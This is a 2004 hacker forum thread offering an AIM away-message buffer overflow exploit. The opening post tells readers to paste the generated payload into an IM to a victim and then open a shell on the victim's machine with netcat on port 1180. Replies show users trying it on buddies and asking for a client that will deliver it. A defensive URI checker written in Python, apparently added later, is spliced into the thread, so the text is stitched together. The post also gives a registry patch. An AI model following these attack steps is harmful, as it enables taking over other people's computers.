Forums: Aim Away Msg Sploit - Forums


Aim Away Msg Sploit bin, source, and readme

#1 illwill

Posted 14 August 2004 - 03:26 PM

AIM AWAY MSG sploit
author: mandragore
Compiler/ReadME: illwill
Credit:
Discovery is credited to Ryan McGeehan and Kevin Benes.
Matt Murphy is credited with discovery as well.



INSTRUCTIONS:
Extract Files in Zip
from commandline type:
c:\>aim-away.exe >owned.txt
open owned.txt and paste contents
into IM window and send to someone
with an away message on. You
should be able to connect to them
on port 1180

Use Netcat:
nc -v xxx.xxx.xxx.xx 1180


- Peace Out
illwill


-------------------------------------------------------------------------
p.s. quick and simple patch to avoid someone doing this to your AIM

======= neuteraimurl.reg =======
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\PROTOCOLS\Handler\aim]
"CLSID"="{3050F406-98B5-11CF-BB82-00AA00BDCE0B}"
======= neuteraimurl.reg =======

or download the newest AIM beta release

-------------------SPLOIT INFO:-------------------------------------------
The vulnerability is caused due to a boundary error within the handling
of "Away" messages and can be exploited to cause a stack-based buffer
overflow by supplying an overly long "Away" message (about 1024 bytes).
A malicious website can exploit this via the "aim:" URI handler by
passing an overly long argument to the "goaway?message" parameter.

Successful exploitation allows execution of arbitrary code on a user's
system when e.g. a malicious website is visited with certain browsers.

The vulnerability has been confirmed in version 5.5.3595. Other versions
may also be affected.

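The advisory above describes the trigger as an aim:goaway?message= URI with an argument longer than roughly 1024 bytes. As an added example (not part of the original post, the readme, or the exploit's own source), here is a small Python checker from the defender's side that parses aim: URIs and flags goaway actions whose decoded message exceeds that threshold; the HTML sample and the exact 1024 cut-off are constructed assumptions taken from the advisory text.

```python
import re
from urllib.parse import unquote

# Threshold from the advisory: the away-message buffer overflows at roughly 1024 bytes.
AWAY_MSG_LIMIT = 1024

# Matches an aim: URI such as aim:goaway?message=... up to whitespace or an HTML delimiter.
AIM_URI_RE = re.compile(r'aim:(?P<action>[A-Za-z]+)\?(?P<query>[^\s"\'<>]*)', re.IGNORECASE)


def parse_aim_uri(uri):
    """Return (action, params) for an aim: URI, or None if it is not one."""
    m = AIM_URI_RE.fullmatch(uri.strip())
    if m is None:
        return None
    params = {}
    for part in m.group('query').split('&'):
        if not part:
            continue
        key, _, value = part.partition('=')
        # Decode percent-encoding so the length check sees what the handler would receive.
        params[key.lower()] = unquote(value)
    return m.group('action').lower(), params


def is_overlong_goaway(uri, limit=AWAY_MSG_LIMIT):
    """True when the URI is a goaway action whose message argument exceeds the limit."""
    parsed = parse_aim_uri(uri)
    if parsed is None:
        return False
    action, params = parsed
    return action == 'goaway' and len(params.get('message', '')) > limit


def find_suspicious_aim_uris(text, limit=AWAY_MSG_LIMIT):
    """Scan a page or log line and return every aim:goaway URI with an overlong message."""
    return [m.group(0) for m in AIM_URI_RE.finditer(text)
            if is_overlong_goaway(m.group(0), limit)]


# Constructed sample: one benign away link, one overlong one, one unrelated goim link.
SAMPLE_HTML = (
    '<a href="aim:goaway?message=back+in+5">set away</a> '
    '<a href="aim:goaway?message=' + 'A' * 1100 + '">click me</a> '
    '<a href="aim:goim?screenname=buddy&message=hi">im</a>'
)

if __name__ == '__main__':
    for hit in find_suspicious_aim_uris(SAMPLE_HTML):
        print('overlong aim:goaway URI, message length', len(parse_aim_uri(hit)[1]['message']))
```

The same check can be run over proxy or web-server logs, where a percent-encoded payload is decoded before the length is measured.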

#2 BeNiNuK

Posted 14 August 2004 - 03:45 PM

very nice find dude! this 1 could be big!

#3 loot

Posted 14 August 2004 - 03:46 PM

really great work ILLwill :>
thx a lot

#4 TRi

Posted 14 August 2004 - 03:47 PM

Interesting, thanks for the detailed advisory + exploit :)

#5 yamahacal

Posted 14 August 2004 - 04:02 PM

Nice, I tried it out with a buddy and AIM would say it's too many characters and GAIM sends it but it is "refused by client". Maybe I'm missing a step or something. Or AIM patched it already O_o

#6 Hellraiseruk

Posted 14 August 2004 - 04:24 PM

Nice job M8, sadly I'm an MSN freak hehe ;)

#7 MrTus

Posted 14 August 2004 - 05:18 PM

Doesn't work. Buffer overflow crashes AIM alright, but spawns no shell. Anyone else figure it out?

#8 Flowby

Posted 14 August 2004 - 06:21 PM

Hmmm, I also tried it... I connected direct to an AIM friend... then both turned firewalls off
and I went to the exe and I got an error???
Strange! And my AIM crashed!! I didn't even get to the part where the exe makes a text file!! :blink:

#9 prog

Posted 14 August 2004 - 07:49 PM

Yea, tells me the msg is too long,
it gets refused.

#10 SecureD

Posted 15 August 2004 - 03:23 AM

Which port is AIM anyway? ;)

#11 prog

Posted 15 August 2004 - 08:51 AM

peerke, on Aug 15 2004, 11:23 AM, said:

Which port is AIM anyway? ;)

Open AIM, press F3, this will take you to AIM options or preferences, same thing really,
then click on sign on/off
and then click 'connection', it's a button in the bottom right.
Common default I believe is 5190.

#12 Terminal

Posted 15 August 2004 - 09:23 AM

Flowby, on Aug 15 2004, 07:51 AM, said:

Hmmm, I also tried it... I connected direct to an AIM friend... then both turned firewalls off
and I went to the exe and I got an error???
Strange! And my AIM crashed!! I didn't even get to the part where the exe makes a text file!! :blink:

Exe makes text file. Here's the text file.


#13 Reaper527

Posted 15 August 2004 - 12:29 PM

Well, I'm able to crash myself, I guess that's a start. However, if I try to send the message to someone else it says that there are too many characters; if I try to get rid of some of the A's, it will paste in, and about 3/4 of the message turns into a hyperlink automatically and I get a message saying it's too many characters when I try sending. I'm going to see if I can disable whatever is causing it to turn into a link. I crashed myself by putting the link in my Mozilla address bar (I had to get rid of some of the A's before Mozilla would even think about using it though). Great exploit, I'm sure someone here will figure out how to get it working properly.

----edit----
Forgot to mention, if I do insert text from file, I can insert the entire owned.txt file, however it can't be sent.

#14 Logan

Posted 15 August 2004 - 02:09 PM

Hyperlink gets cut off before the code anyway (tried doing it while DC'd).

Btw, you will only see the other's IP if you're directly connected; 5190 is the AIM servers.. 4443 is the DC port unless it changed.

Anyone get it to work?

#15 JaG

Posted 15 August 2004 - 04:47 PM

prog, on Aug 15 2004, 03:49 AM, said:

Yea, tells me the msg is too long,
it gets refused.

I'm having the same problem. Anyone know which client will allow me to send the xploit?


thnx :)